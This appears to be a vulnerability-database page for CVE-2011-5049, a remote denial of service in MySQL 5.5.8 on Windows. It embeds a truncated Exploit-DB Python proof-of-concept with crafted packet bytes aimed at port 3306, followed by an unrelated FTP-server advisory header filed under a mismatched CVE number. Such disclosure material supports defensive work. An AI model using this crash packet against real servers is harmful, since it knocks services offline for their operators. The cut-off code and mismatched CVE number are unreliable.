CVE-2011-5049
published 2012-01-04CVE-2011-5049: MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
PriorityP425medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
4.53%
90.4th percentile
MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MySQL 5.5.8 - Remote Denial of Service
exploitdb·2011-12-24
CVE-2011-5049 MySQL 5.5.8 - Remote Denial of Service
MySQL 5.5.8 - Remote Denial of Service
---
import socket, sys
print "\n"
print "----------------------------------------------------------------"
print "| MySQL 5.5.8 Null Ptr (windows) |"
print "| Level Smash the Stack |"
print "----------------------------------------------------------------"
print "\n"
buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")
buf2=("\x11\x00\x00\x00\x03set autocommit30")
def usage():
print "usage : ./mysql.py "
print "example: ./mysql.py 192.168.1.22"
def main():
if len(sys.argv) != 2:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = sys.argv[1]
PORT = int(3306)
s.connect((HOST,PORT))
print "[*] Connect"
s.send(
Exploit-DB
optima apiftp server 1.5.2.13 - Multiple Vulnerabilities
exploitdb·2011-11-14
CVE-2012-5049 optima apiftp server 1.5.2.13 - Multiple Vulnerabilities
optima apiftp server 1.5.2.13 - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: Optima APIFTP Server
http://www.optimalog.com/home.html
Versions: <= 1.5.2.13
Platforms: Windows
Bugs: A] NULL pointer
B] endless loop
Exploitation: remote
Date: 13 Nov 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
1) Introduction
Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.
#####
No writeups or analysis indexed.
2012-01-04
Published